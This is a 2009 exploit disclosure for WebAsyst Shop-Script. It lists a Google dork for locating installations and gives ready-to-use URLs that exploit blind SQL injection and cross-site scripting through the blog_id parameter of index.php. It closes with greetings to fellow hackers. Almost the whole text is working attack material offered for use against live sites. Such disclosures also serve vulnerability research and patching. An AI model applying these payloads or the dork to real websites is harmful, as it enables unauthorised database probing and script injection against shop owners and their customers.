WebAsyst suffers from blind SQL injection and cross site scripting vulnerabilities.
e0468c3a8241545266b44377776184b34b3bd35e54e7b66a0fce93fe8ebc8432
==============================================================================================
Title : (Blind SQL/XSS) Multiple Remote Vulnerabilities
Software : WebAsyst Shop-Script
Vendor : http://www.webasyst.net
Date : 03 July 2009 (Indonesia)
Author : Vrs-hCk
Contact : d00r@telkom.net
Blog : http://c0li.blogspot.com/
==============================================================================================
[-] Google Dork
"Powered by WebAsyst Shop-Script"
[-] Vulnerable (Blind SQL/XSS)
index.php
[-] Exploit (Blind SQL)
http://[site]/[path]/index.php?ukey=news&blog_id=[valid_id] and substring(@@version,1,1)=4
http://[site]/[path]/index.php?ukey=news&blog_id=[valid_id] and substring(@@version,1,1)=5
[-] Exploit (XSS)
http://[site]/[path]/index.php?ukey=news&blog_id=<script>alert(123)</script>
==============================================================================================
Greetz :
Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
c0li.m0de.0n and Behave oR BeGone !!!
==============================================================================================